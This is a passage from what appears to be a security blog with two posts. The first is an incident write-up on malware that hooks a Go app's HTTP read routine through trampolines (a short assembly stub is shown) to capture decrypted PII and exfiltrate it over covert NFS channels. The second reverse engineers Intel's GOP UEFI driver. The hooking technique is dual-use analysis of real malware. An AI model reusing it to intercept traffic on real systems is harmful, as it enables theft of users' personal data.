  • When the trampoline is called (from the new near jump at the beginning of net/http.(*connReader).Read) it examines the stack to locate the return address, and checks whether a second type of trampoline, which we'll refer to as the return trampoline, has already been allocated for that return address,
  • If not, it allocates a new return trampoline for this call location of net/http.(*connReader).Read from the code below, replacing 123456789ABCDEFh with the absolute address of a function in the malware,
  • GOlang uses memory for all function argument passing, so immediately after the virtual function call to Read() there will always be a 5 byte mov reg, [rsp+?] to load Read()'s result into a register. This mov instruction is copied into the first db 5 dup(0) area,
  • Those same 5 bytes are then replaced with a near jump to the 2nd trampoline,
  • The 2nd db 5 dup(0) area is filled with a relative near jmp back to the original code patch site.

        mov     rax, 123456789ABCDEFh
        mov     rdi, rsp
        call    rax
        db 5 dup(0)
        db 5 dup(0)      
    

This way eventually all the net/http.(*connReader).Read call sites are patched to call a function immediately after the net/http.(*connReader).Read virtual call returns. This lets the malicious code inspect the decoded HTTP packet.
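The 5-byte patches mentioned above are plain x86-64 `jmp rel32` instructions: opcode E9 followed by a signed 32-bit displacement counted from the end of the instruction. A small sketch of the encoding (the function name and the example addresses are made up):

```python
import struct


def encode_near_jmp(patch_addr: int, target_addr: int) -> bytes:
    """Encode `jmp rel32` (opcode E9) placed at patch_addr and landing on target_addr."""
    rel = target_addr - (patch_addr + 5)   # displacement is relative to the next instruction
    if not -2**31 <= rel < 2**31:
        raise ValueError("target is out of rel32 range")
    return b"\xe9" + struct.pack("<i", rel)


print(encode_near_jmp(0x401000, 0x7F0000).hex())
```

The range check also suggests why the trampoline area is allocated right after the binary: a rel32 jump can only reach targets within about 2 GB of the patch site.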

On initialization the 1st stage malware also loads the hefty 2nd stage through the 2nd covert channel, and passes each buffer received from the patch on net/http.(*connReader).Read to it for inspection. The collected data is compressed by the malware and stored back to the NFS server (through the 2nd covert channel, which bypasses read ACLs on NFS).

Before this case I did not think there was any nice way to hook random GO binaries; this technique is pretty cool.

Unfortunately I cannot discuss what the 2nd payload actually does, as it would reveal stuff my employer isn't ready for yet.

How did the kernel get patched, and why not the golang app?

The golang app is built inside the CI/CD network segment. This segment can only be accessed through monitored jump hosts with MFA. Each day, the CI/CD pipeline clones the source code from the GIT server, builds it, and automatically tests it in a pre-production segment. Once tested it gets digitally signed and uploaded to the NFS server. The running app self updates, checking the digital signature beforehand.

The kernel, on the other hand, is manually built by the guy responsible for it on his own laptop. He then digitally signs it and stores it on a server where it is used by the CI/CD pipeline. Fortunately for us a commented out line in a script in the CI/CD pipeline (a line that was not commented out in the GIT!) did not delete old versions of the kernel, so we know which versions were tampered with.

We noticed a 3 month gap about 5 months ago, and it corresponded with the guy moving the kernel build from a Linux laptop to a new Windows laptop with a VirtualBox VM in it for compiling the kernel. It looks as if it took the attackers three months to gain access back into the box and into the VM build.

What we have so far

We found a bunch of malware sitting in the network collecting PII from incoming HTTPS connections after they are decoded in a GOlang app. The data is exfiltrated through the malware network and eventually sent to the bad guys. We have more info but I am still working on it; expect another blog post in the future with more details, samples, etc.

Q&A

  • Q: What was the initial access vector?

    A: We have a pretty good idea, but I cannot publish it yet (RD and stuff). Stay tuned!

  • Q: Why didn't you upload anything to VT yet?

    A: A few reasons:

    • I need to make sure no client info is in the binaries - some of the binaries have hardcoded strings that cannot be shared
    • All of the binaries I have have been reconstructed from memory dumps, so are not in their original form. Does anyone know how to upload partial dumps into VT?
  • Q: Is there a security vulnerability in GO? in the Kernel?

    A: Definitely not! This is just an obnoxious attacker doing what obnoxious attackers do. I might even say the complexity of the stuff means they don't have a 0day for this platform.

  • Q: What about YARA rules, C2 address, etc'?

    A: Wait for it, there is a lot more coming!

  • Q: Why did you publish instead of collecting more?

    A: To quote the client "I don't care who else they are attacking. I just want them off my lawn!", and he thinks publishing will prevent them from returning to THIS network. Hopefully what we publish next time will get them off other people's lawns.

  • Q: Any Windows malware?

    A: Definitely, including what we believe is an EDR bypass. Still working on it.

  • Q: Any zero days?

    A: Maybe …

  • Q: Who are these bad guys you keep referring to?

    A: No clue. Didn't find anything similar published. There is no sure way to make anything except unsubstantiated guesses, and I won't do that.

To be continued.

Security of the Intel Graphics Stack - Part 2 - FW <-> GuC

24 February 2021 at 05:00

Today we'll continue our voyage into the graphics subsystem components.

The question we'll try to answer is what kind of communications occur between the GuC and the rest of the system. In this post we'll look at firmware components and next post at Windows components.

For a reminder of what the GuC is, see the part 1 post.

Part 1: The IntelGOP DXE driver

The Intel Graphics Output Protocol (GOP) EFI DXE driver can be extracted in various versions from the UEFI capsules available through many vendors. For this post I redid my original analysis on a recent version from a Cannon Lake system.

The purpose of this exercise is to try and see whether the GOP driver communicates with the GuC over the PCIe bus (TL;DR: it doesn't).

The binary isn't too large - 84KB, so we can try to completely reverse engineer it. I used both IDA+HexRays and a dynamic analysis UEFI emulator I developed for just these cases. The emulator lets me run EFI DXE drivers in Windows, simulating many UEFI services and allowing me to modify/inspect EFI interfaces and hook UEFI protocol structs; it even has some fuzzing capabilities.

Looking at the driver's entrypoint we see it stores the different service tables in globals and then jumps to the main() function, which I called GopEntryPoint().

.text:0000000000001580 ; EFI_STATUS __fastcall ModuleEntryPoint(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
.text:0000000000001580                 public _ModuleEntryPoint
.text:0000000000001580 _ModuleEntryPoint proc near             ; DATA XREF: HEADER:00000000000000E8↑o
.text:0000000000001580                 sub     rsp, 28h
.text:0000000000001584                 mov     r8, [rdx+60h]
.text:0000000000001588                 mov     rax, [rdx+58h]
.text:000000000000158C                 mov     cs:gIMAGE_HANDLE, rcx
.text:0000000000001593                 mov     cs:gBOOT_SERVICES, r8
.text:000000000000159A                 mov     cs:gRUNTIME_SERVICES, rax
.text:00000000000015A1                 mov     cs:gBOOT_SERVICES2, r8
.text:00000000000015A8                 mov     cs:gSYSTEM_TABLE2, rdx
.text:00000000000015AF                 call    GopEntryPoint
.text:00000000000015B4                 add     rsp, 28h
.text:00000000000015B8                 retn
.text:00000000000015B8 _ModuleEntryPoint endp

The first part of GopEntryPoint() is really boring: it just sets up version information in global strings.

__int64 __fastcall GopEntryPoint(EFI_HANDLE img_handle_arg)
{
  EFI_HANDLE image_handle; // rbx
  CHAR16 *driver_desc_ptr; // rax
  __int64 img_handle; // r11
  __int64 result; // rax
  EFI_HANDLE Handle; // [rsp+50h] [rbp+18h]
  EFI_LOADED_IMAGE_PROTOCOL *Interface; // [rsp+58h] [rbp+20h]

  image_handle = img_handle_arg;
  v2 = atoi(L"0") == 1;
  driver_desc_ptr = gDriverDescription;
  v4 = 'I';
  byte_142A0 = v2;
  do
  {
    *driver_desc_ptr = v4;
    ++driver_desc_ptr;
    v4 = *(CHAR16 *)((char *)driver_desc_ptr + (char *)L"Intel(R) GOP Driver" - (char *)gDriverDescription);
  }
  while ( v4 );
  *driver_desc_ptr = 0;
  strcat(gDriverDescription, L" [");
  strcat(gDriverDescription, L"11");
  strcat(gDriverDescription, L".");
  strcat(gDriverDescription, L"0");
  strcat(gDriverDescription, L".");
  strcat(gDriverDescription, L"1014");
  strcat(gDriverDescription, L"]");
  gDriverState.ImgHandle = img_handle;
  v12 = &gDriverVersion;
  v13 = '1';
  do
  {
    *v12 = v13;
    ++v12;
    v13 = *(CHAR16 *)((char *)v12 + (char *)L"11" - (char *)&gDriverVersion);
  }
  while ( v13 );
  *v12 = 0;
  strcat(&gDriverVersion, L".");
  strcat(&gDriverVersion, L"0");
  strcat(&gDriverVersion, L".");
  strcat(&gDriverVersion, L"1014");
  gDriverState.ControllerName = (__int64)L"Intel(R) Graphics Controller";
  gDriverState.DriverVersion = v17;
  atoi(L"11");
  atoi(L"0");
  v18 = atoi(L"1014");

The second part does the actual work. First it looks up the EFI_LOADED_IMAGE_PROTOCOL to set up the unload routine:

  gDRIVER_BINDING_PROTOCOL.Version = v18 + v19;
  result = gBOOT_SERVICES->OpenProtocol(
             image_handle,
             &EFI_LOADED_IMAGE_PROTOCOL_GUID,
             (void **)&Interface,
             image_handle,
             image_handle,
             2u);
  if ( result >= 0 )
  {
    Interface->Unload = (EFI_IMAGE_UNLOAD)UnloadImage;

Then it installs four protocol handlers, three of which I identified: one for driver binding and two for component name handling. InstallMultipleProtocolInterfaces(..) can accept multiple protocols; each protocol has a GUID and the "virtual table"-like structure used by UEFI, and the final entry is NULL. Most UEFI protocol GUIDs are public (and appear in the EDK), so we can identify them easily and thus identify the virtual table structures associated with them. For example, for the UEFI driver binding protocol we have in DriverBinding.h:

#define EFI_DRIVER_BINDING_PROTOCOL_GUID \
	{0x18A031AB,0xB443,0x4D1A,0xA5,0xC0,0x0C,0x09,0x26,0x1E,0x9F,0x71}

GUID_VARIABLE_DECLARATION(gEfiDriverBindingProtocolGuid, EFI_DRIVER_BINDING_PROTOCOL_GUID);

typedef struct _EFI_DRIVER_BINDING_PROTOCOL EFI_DRIVER_BINDING_PROTOCOL;

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_SUPPORTED) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This, 
	IN EFI_HANDLE ControllerHandle,
	IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath OPTIONAL
);

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_START) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This,
	IN EFI_HANDLE ControllerHandle,
	IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath OPTIONAL
);

typedef EFI_STATUS (EFIAPI *EFI_DRIVER_BINDING_PROTOCOL_STOP) (
	IN EFI_DRIVER_BINDING_PROTOCOL *This,
	IN EFI_HANDLE ControllerHandle,
	IN UINTN NumberOfChildren,
	IN EFI_HANDLE *ChildHandleBuffer OPTIONAL
);

struct _EFI_DRIVER_BINDING_PROTOCOL {
	EFI_DRIVER_BINDING_PROTOCOL_SUPPORTED Supported;
	EFI_DRIVER_BINDING_PROTOCOL_START Start;
	EFI_DRIVER_BINDING_PROTOCOL_STOP Stop;
	UINT32 Version;
	EFI_HANDLE ImageHandle;
	EFI_HANDLE DriverBindingHandle;
};

This enables us to reverse the rest of GopEntryPoint:

    Handle = image_handle;
    gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
      &Handle,
      &EFI_DRIVER_BINDING_PROTOCOL_GUID,
      &gDRIVER_BINDING_PROTOCOL,
      &EFI_COMPONENT_NAME2_PROTOCOL_GUID,
      &gCOMPONENT_NAME2_PROTOCOL,
      0i64);
    gDRIVER_BINDING_PROTOCOL.DriverBindingHandle = Handle;
    gDRIVER_BINDING_PROTOCOL.ImageHandle = image_handle;
    gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
      &gDRIVER_BINDING_PROTOCOL.DriverBindingHandle,
      &UNKNOWN_PROTOCOL_GUID,
      &gDriverState.unknwon_proto,
      0i64);
    result = gBOOT_SERVICES->InstallMultipleProtocolInterfaces(
               &gDRIVER_BINDING_PROTOCOL.DriverBindingHandle,
               &GOP_COMPONENT_NAME2_PROTOCOL_GUID,
               &gGOP_COMPONENT_NAME2_PROTOCOL,
               0i64);
    if ( result >= 0 )
      qword_142B0 = (__int64)image_handle;
  }
  return result;
}

All the GUID values appear close to each other at the beginning of the binary, so we can take a shortcut and find all the GUIDs the driver uses:

.text:0000000000000240 EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID dd 9042A9DEh            ; Data1
.text:0000000000000240                                         ; DATA XREF: HEADER:00000000000000EC↑o
.text:0000000000000240                                         ; HEADER:00000000000001D4↑o ...
.text:0000000000000240                 dw 23DCh                ; Data2
.text:0000000000000240                 dw 4A38h                ; Data3
.text:0000000000000240                 db 96h, 0FBh, 7Ah, 0DEh, 0D0h, 80h, 51h, 6Ah; Data4
.text:0000000000000250 EFI_EDID_ACTIVE_PROTOCOL_GUID dd 0BD8C1056h           ; Data1
.text:0000000000000250                                         ; DATA XREF: InstallGraphicsProto+124↓o
.text:0000000000000250                                         ; uninstall2?+9B↓o ...
.text:0000000000000250                 dw 9F36h                ; Data2
.text:0000000000000250                 dw 44ECh                ; Data3
.text:0000000000000250                 db 92h, 0A8h, 0A6h, 33h, 7Fh, 81h, 79h, 86h; Data4
.text:0000000000000260 EFI_EDID_DISCOVERED_PROTOCOL_GUID dd 1C0C34F6h            ; Data1
.text:0000000000000260                                         ; DATA XREF: sub_1CA4+2A5↓o
.text:0000000000000260                                         ; InstallGraphicsProto+DF↓o ...
.text:0000000000000260                 dw 0D380h               ; Data2
.text:0000000000000260                 dw 41FAh                ; Data3
.text:0000000000000260                 db 0A0h, 49h, 8Ah, 0D0h, 6Ch, 1Ah, 66h, 0AAh; Data4
.text:0000000000000270 GOP_DISPLAY_BRIGHTNESS_PROTOCOL_GUID dd 6FF23F1Dh            ; Data1
.text:0000000000000270                                         ; DATA XREF: sub_1F78+B1↓o
.text:0000000000000270                                         ; uninstall2?+14B↓o ...
.text:0000000000000270                 dw 877Ch                ; Data2
.text:0000000000000270                 dw 4B1Bh                ; Data3
.text:0000000000000270                 db 93h, 0FCh, 0F1h, 42h, 0B2h, 0EEh, 0A6h, 0A7h; Data4
.text:0000000000000280 GOP_DISPLAY_BIST_PROTOCOL_GUID dd 0F51DD33Ah           ; Data1
.text:0000000000000280                                         ; DATA XREF: sub_1F78+75↓o
.text:0000000000000280                                         ; uninstall2?+F5↓o ...
.text:0000000000000280                 dw 0E57Fh               ; Data2
.text:0000000000000280                 dw 4020h                ; Data3
.text:0000000000000280                 db 0B4h, 66h, 0F4h, 0C1h, 71h, 0C6h, 0E4h, 0F7h; Data4
.text:0000000000000290 EFI_PCI_IO_PROTOCOL_GUID dd 4CF5B200h            ; Data1
.text:0000000000000290                                         ; DATA XREF: DriverBindingProtoSupported+CB↓o
.text:0000000000000290                                         ; DriverBindingProtoSupported+173↓o ...
.text:0000000000000290                 dw 68B8h                ; Data2
.text:0000000000000290                 dw 4CA5h                ; Data3
.text:0000000000000290                 db 9Eh, 0ECh, 0B2h, 3Eh, 3Fh, 50h, 2, 9Ah; Data4
.text:00000000000002A0 GOP_COMPONENT_NAME2_PROTOCOL_GUID dd 651B7EBDh            ; Data1
.text:00000000000002A0                                         ; DATA XREF: GopEntryPoint+22F↓o
.text:00000000000002A0                 dw 0CE13h               ; Data2
.text:00000000000002A0                 dw 41D0h                ; Data3
.text:00000000000002A0                 db 82h, 0E5h, 0A0h, 63h, 0ABh, 0BEh, 9Bh, 0B6h; Data4
.text:00000000000002B0 UNKNOWN_PROTOCOL_GUID dd 0DBCB2FCDh           ; Data1
.text:00000000000002B0                                         ; DATA XREF: UnloadImage+9A↓o
.text:00000000000002B0                                         ; GopEntryPoint+203↓o
.text:00000000000002B0                 dw 0E29Ah               ; Data2
.text:00000000000002B0                 dw 410Eh                ; Data3
.text:00000000000002B0                 db 9Dh, 0D9h, 0FAh, 9Dh, 5Fh, 0F4h, 0CDh, 0A7h; Data4
.text:00000000000002C0 MAYBE_AUX_PROTOCOL_GUID? dd 0C7D4703Bh           ; Data1
.text:00000000000002C0                                         ; DATA XREF: DriverBindingProtoStartImp+2A8↓o
.text:00000000000002C0                                         ; DriverBindingProtoStop+70↓o
.text:00000000000002C0                 dw 0F36h                ; Data2
.text:00000000000002C0                 dw 4E51h                ; Data3
.text:00000000000002C0                 db 0A9h, 83h, 5Eh, 61h, 0ACh, 0B8h, 68h, 3Ch; Data4
.text:00000000000002D0 EFI_DEVICE_PATH_PROTOCOL_GUID dd 9576E91h             ; Data1
.text:00000000000002D0                                         ; DATA XREF: DriverBindingProtoSupported+5F↓o
.text:00000000000002D0                                         ; DriverBindingProtoSupported+A2↓o ...
.text:00000000000002D0                 dw 6D3Fh                ; Data2
.text:00000000000002D0                 dw 11D2h                ; Data3
.text:00000000000002D0                 db 8Eh, 39h, 0, 0A0h, 0C9h, 69h, 72h, 3Bh; Data4
.text:00000000000002E0 ; EFI_GUID EFI_LOADED_IMAGE_PROTOCOL_GUID
.text:00000000000002E0 EFI_LOADED_IMAGE_PROTOCOL_GUID dd 5B1B31A1h            ; Data1
.text:00000000000002E0                                         ; DATA XREF: GopEntryPoint+169↓o
.text:00000000000002E0                 dw 9562h                ; Data2
.text:00000000000002E0                 dw 11D2h                ; Data3
.text:00000000000002E0                 db 8Eh, 3Fh, 0, 0A0h, 0C9h, 69h, 72h, 3Bh; Data4
.text:00000000000002F0 EFI_DRIVER_BINDING_PROTOCOL_GUID dd 18A031ABh            ; Data1
.text:00000000000002F0                                         ; DATA XREF: UnloadImage+BB↓o
.text:00000000000002F0                                         ; GopEntryPoint+1D2↓o
.text:00000000000002F0                 dw 0B443h               ; Data2
.text:00000000000002F0                 dw 4D1Ah                ; Data3
.text:00000000000002F0                 db 0A5h, 0C0h, 0Ch, 9, 26h, 1Eh, 9Fh, 71h; Data4
.text:0000000000000300 EFI_COMPONENT_NAME2_PROTOCOL_GUID dd 6A7A5CFFh            ; Data1
.text:0000000000000300                                         ; DATA XREF: UnloadImage+A1↓o
.text:0000000000000300                                         ; GopEntryPoint+1B8↓o
.text:0000000000000300                 dw 0E8D9h               ; Data2
.text:0000000000000300                 dw 4F70h                ; Data3
.text:0000000000000300                 db 0BAh, 0DAh, 75h, 0ABh, 30h, 25h, 0CEh, 14h; Data4
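
Since the GUIDs sit in consecutive 16-byte slots, the same shortcut can be scripted. The following is a minimal sketch, not the tooling used for this post: the helper names guid_at and dump_guid_table are hypothetical, and the sample buffer is a synthetic stand-in built from two GUIDs in the listing above rather than the real driver image.

```python
import uuid

def guid_at(blob: bytes, offset: int) -> uuid.UUID:
    """Decode the 16 bytes at `offset` as an EFI_GUID.

    EFI_GUID stores Data1..Data3 little-endian and Data4 as raw bytes,
    which is exactly the layout uuid.UUID(bytes_le=...) expects.
    """
    return uuid.UUID(bytes_le=blob[offset:offset + 16])

def dump_guid_table(blob: bytes, start: int, end: int):
    """Yield (offset, GUID) for every 16-byte slot in [start, end)."""
    for ofs in range(start, end, 16):
        yield ofs, guid_at(blob, ofs)

# Synthetic stand-in for the driver image (assumption: two GUIDs from the listing).
sample = bytes.fromhex(
    "dea94290dc23384a96fb7aded080516a"  # EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
    "00b2f54cb868a54c9eecb23e3f50029a"  # EFI_PCI_IO_PROTOCOL_GUID
)

for ofs, guid in dump_guid_table(sample, 0, len(sample)):
    print(f"{ofs:#06x}  {guid}")
```

The canonical string form printed here is what you would search for in the EDK headers or the UEFI specification to put a name on each entry.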

A few of the GUIDs couldn't be identified. Another "fast forward" trick I can use is to find all the locations where protocols are installed or requested. If we look at how protocols are installed using gBOOT_SERVICES::InstallMultipleProtocolInterfaces:

.text:0000000000002938 FF 90 48 01 00 00                 call    qword ptr dword_148[rax]

We see the offset is pretty large, 0x148. We can just search for the wildcard "call qword ptr dword_148[reg]" and see if reg contains the global gBOOT_SERVICES. This way we can jump directly to the functions and identify what they do and name them:

Address	Function	Instruction
.text:000000000000188B	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000018C3	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000018E8	GopEntryPoint	                    FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001ECC	EnumConnectionsAndInstallEdidProto	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001F50	EnumConnectionsAndInstallEdidProto	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000001FFA	InstallBrightnessProto	            FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000002036	InstallBrightnessProto              FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:000000000000221F	InstallGraphicsProto	            FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:00000000000022A0	InstallGraphicsProto             	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
.text:0000000000002938	DriverBindingProtoStartImp        	FF 90 48 01 00 00                 call    [rax+EFI_BOOT_SERVICES.InstallMultipleProtocolInterfaces]
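
The wildcard search itself is easy to approximate outside IDA. Below is a rough sketch under a few assumptions: the function name find_indirect_calls is made up, the sample bytes are synthetic, and the scan is a plain byte-pattern match rather than a real disassembly, so hits can be false positives and you still have to check that the base register holds gBOOT_SERVICES.

```python
import re

def find_indirect_calls(code: bytes, disp: int):
    """Find `call qword ptr [reg+disp32]` candidates in raw code bytes.

    Encoding: opcode FF /2 with mod=10, so ModRM is 0x90 | reg.
    0x94 is skipped because rm=100 means a SIB byte follows.
    Returns (offset of the FF byte, low 3 bits of the base register).
    """
    pattern = re.compile(
        rb"\xff([\x90-\x93\x95-\x97])" + re.escape(disp.to_bytes(4, "little"))
    )
    return [(m.start(), m.group(1)[0] & 7) for m in pattern.finditer(code)]

# Synthetic code bytes (assumption, not taken from the driver):
sample = bytes.fromhex(
    "4889c8"        # mov  rax, rcx
    "ff9048010000"  # call qword ptr [rax+148h]
    "90"            # nop
    "ff9348010000"  # call qword ptr [rbx+148h]
    "ff9018010000"  # call qword ptr [rax+118h]  (different table slot)
)

for ofs, reg in find_indirect_calls(sample, 0x148):
    print(f"offset {ofs:#x}: base register index {reg}")
```

Passing a different displacement (for example 0x118 for OpenProtocol on x64) gives the list of places where protocols are requested rather than installed.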

Walking these call sites also gets us all the function tables for these protocols, and helps us understand the global state struct for the driver. Unlike C++, UEFI protocol functions receive a This pointer to a structure that contains both data members and function pointers, for example for the GOP protocol:

...
typedef EFI_STATUS (EFIAPI *EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT) (
    IN EFI_GRAPHICS_OUTPUT_PROTOCOL *This,
    IN EFI_GRAPHICS_OUTPUT_BLT_PIXEL *BltBuffer OPTIONAL,
    IN EFI_GRAPHICS_OUTPUT_BLT_OPERATION BltOperation,
    IN UINTN SourceX, IN UINTN SourceY,
    IN UINTN DestinationX, IN UINTN DestinationY,
    IN UINTN Width, IN UINTN Height,
    IN UINTN Delta OPTIONAL
);

typedef struct {
    UINT32 MaxMode;
    UINT32 Mode;
    EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *Info;
    UINTN SizeOfInfo;
    EFI_PHYSICAL_ADDRESS FrameBufferBase;
    UINTN FrameBufferSize;
} EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE;

struct _EFI_GRAPHICS_OUTPUT_PROTOCOL {
    EFI_GRAPHICS_OUTPUT_PROTOCOL_QUERY_MODE QueryMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_SET_MODE SetMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT Blt;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE *Mode;
};

So the protocol structure has to be stored in some state structure. If the state structure is a singleton it can be stored as a global, but if we want multiple copies, the driver allocates a state structure, places the protocol structure at a known offset within it, and can then calculate the start of the structure from the This pointer provided to the protocol functions. We can use this information to try to piece together this global structure:

00000000 DriverState     struc ; (sizeof=0xE8, mappedto_92)
00000000                                         ; XREF: .text:gDriverState/r
00000000 language        dq ?                    ; offset
00000008 ImgHandle       dq ?                    ; XREF: GopEntryPoint+A9/w
00000010 field_10        dd ?
00000014 field_14        dd ?
00000018 graphics_proto  dq ?
00000020 field_20        dq ?                    ; XREF: GetDriverVersion+16/o
00000028 DriverVersion   dq ?                    ; XREF: GopEntryPoint+125/w
00000030 field_30        dq ?
00000038 active_proto_copy dq ?
00000040 field_40        dq ?                    ; XREF: GetControllerName+99/o
00000048 ControllerName  dq ?                    ; XREF: GopEntryPoint+11E/w
00000050 field_50        dq ?
00000058 field_58        dq ?
00000060 brightness_proto dq ?                   ; XREF: UnloadImage+8E/o
00000060                                         ; GopEntryPoint+1EE/o
00000068 name_proto      dq ?
00000070 bist_proto_orig GOP_DISPLAY_BIST_PROTOCOL_FUNC_TABLE ?
00000070                                         ; XREF: InstallBrightnessProto+50/o
00000080 bist_proto      GOP_DISPLAY_BIST_PROTOCOL ?
00000080                                         ; XREF: sub_44D8+21/o
00000080                                         ; sub_44D8+28/w ...
00000094 field_94        dd ?
00000098 field_98        dq ?                    ; XREF: sub_4900+24/o
00000098                                         ; sub_4900+2F/w ...
000000A0 field_A0        dq ?                    ; XREF: sub_4900+36/w
000000A0                                         ; sub_4900+319/r ...
000000A8 field_A8        dq ?                    ; XREF: sub_245C+14/r
000000A8                                         ; sub_245C+1B/o ...
000000B0 field_B0        dq ?                    ; XREF: sub_245C+86/r
000000B0                                         ; sub_259C+6C/r ...
000000B8 field_B8        dq ?                    ; XREF: sub_35A4+37A/o
000000B8                                         ; sub_35A4+384/w ...
000000C0 field_C0        dq ?                    ; XREF: sub_35A4+38B/w
000000C0                                         ; sub_35A4+3EF/r ...
000000C8 field_C8        dq ?
000000D0 field_D0        dq ?                    ; XREF: sub_35A4+420/o
000000D8 field_D8        dq ?
000000E0 field_E0        dq ?
000000E8 DriverState     ends

and so on.
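
The "recover the state structure from the This pointer" calculation mentioned above is just a subtraction of a known field offset. Here is a toy model using ctypes; the State and Proto layouts and the state_from_this helper are invented for illustration and are not the driver's real structures.

```python
import ctypes

class Proto(ctypes.Structure):
    # Stand-in for a protocol "virtual table" (hypothetical layout).
    _fields_ = [
        ("QueryMode", ctypes.c_void_p),
        ("SetMode", ctypes.c_void_p),
        ("Blt", ctypes.c_void_p),
        ("Mode", ctypes.c_void_p),
    ]

class State(ctypes.Structure):
    # Stand-in for a per-instance driver state that embeds the protocol.
    _fields_ = [
        ("signature", ctypes.c_uint64),
        ("handle", ctypes.c_void_p),
        ("gop", Proto),
        ("counter", ctypes.c_uint32),
    ]

def state_from_this(this_addr: int) -> State:
    """Given the address of the embedded protocol, return the enclosing State."""
    return State.from_address(this_addr - State.gop.offset)

state = State(signature=0x53504F47, counter=7)
this_addr = ctypes.addressof(state.gop)  # what a protocol function receives as This
recovered = state_from_this(this_addr)
print(hex(recovered.signature), recovered.counter)
```

When reversing, the interesting part is the constant being subtracted: it tells you at which offset of the state structure the protocol table lives.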

It won't be too interesting to just dump more and more disassembled functions here, as our goal is to find possible access to the GuC. None of the functions I identified had any connection to the GuC, so next I looked at all accesses to PCI devices, as GuC accesses should be made using PCI. The devices are identified using EFI_DEVICE_PATH_PROTOCOL and accessed through EFI_PCI_IO_PROTOCOL_GUID.

DriverBindingProtoSupported+CB lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoSupported+173 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
EnumConnectionsAndInstallEdidProto+259 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
sub_245C+9C lea r8, EFI_PCI_IO_PROTOCOL_GUID
sub_259C+33 lea r8, EFI_PCI_IO_PROTOCOL_GUID
sub_259C+81 lea r8, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStartImp+44 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStartImp+20C lea rdx, EFI_PCI_IO_PROTOCOL_GUID
uninstall?+76 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
uninstall?+220 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStop+DD lea rdx, EFI_PCI_IO_PROTOCOL_GUID
DriverBindingProtoStop+120 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
sub_2EC0+158 lea r8, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName+3A lea rdx, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName+59 lea rdx, EFI_PCI_IO_PROTOCOL_GUID
GetControllerName:loc_55C6 lea r8, EFI_PCI_IO_PROTOCOL_GUID

Some of these references are spurious, like:

.text:00000000000024F8                 lea     r8, EFI_PCI_IO_PROTOCOL_GUID
.text:00000000000024FF                 mov     rcx, rsi
.text:0000000000002502                 call    sub_5F04

Since sub_5F04 overwrites r8 immediately:

.text:0000000000005F04 sub_5F04        proc near               ; CODE XREF: sub_245C+A6↑p
.text:0000000000005F04                                         ; sub_259C+41↑p ...
.text:0000000000005F04
.text:0000000000005F04 count           = qword ptr -18h
.text:0000000000005F04 arg_0           = qword ptr  8
.text:0000000000005F04 proto_info      = qword ptr  20h
.text:0000000000005F04
.text:0000000000005F04                 mov     [rsp+arg_0], rbx
.text:0000000000005F09                 push    rdi
.text:0000000000005F0A                 sub     rsp, 30h
.text:0000000000005F0E                 mov     rax, cs:gBOOT_SERVICES
.text:0000000000005F15                 mov     rdi, rdx
.text:0000000000005F18                 lea     r9, [rsp+38h+count]
.text:0000000000005F1D                 lea     r8, [rsp+38h+proto_info]      ;; HERE!!

Long story short: no code in the GOP DXE driver communicates with the GuC.

Before moving on to CSME vs GuC, I was curious who exactly uses all these protocols in the rest of the UEFI BIOS and in Windows. I extracted the UEFI capsule and also mounted the Windows ISO and WIM files (dism /mount-image /imagefile:e:\sources\install.wim /index:1 /mountdir:c:\mnt\install /readonly), and then ran the following Python script:

from struct import unpack
from os import walk
from mmap import mmap, ACCESS_READ
import os.path as path

GUIDS = (
((0xDE, 0xA9, 0x42, 0x90, 0xDC, 0x23, 0x38, 0x4A, 0x96, 0xFB, 0x7A, 0xDE, 0xD0, 0x80, 0x51, 0x6A), 'EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID'),
((0x56, 0x10, 0x8C, 0xBD, 0x36, 0x9F, 0xEC, 0x44, 0x92, 0xA8, 0xA6, 0x33, 0x7F, 0x81, 0x79, 0x86), 'EFI_EDID_ACTIVE_PROTOCOL_GUID'),
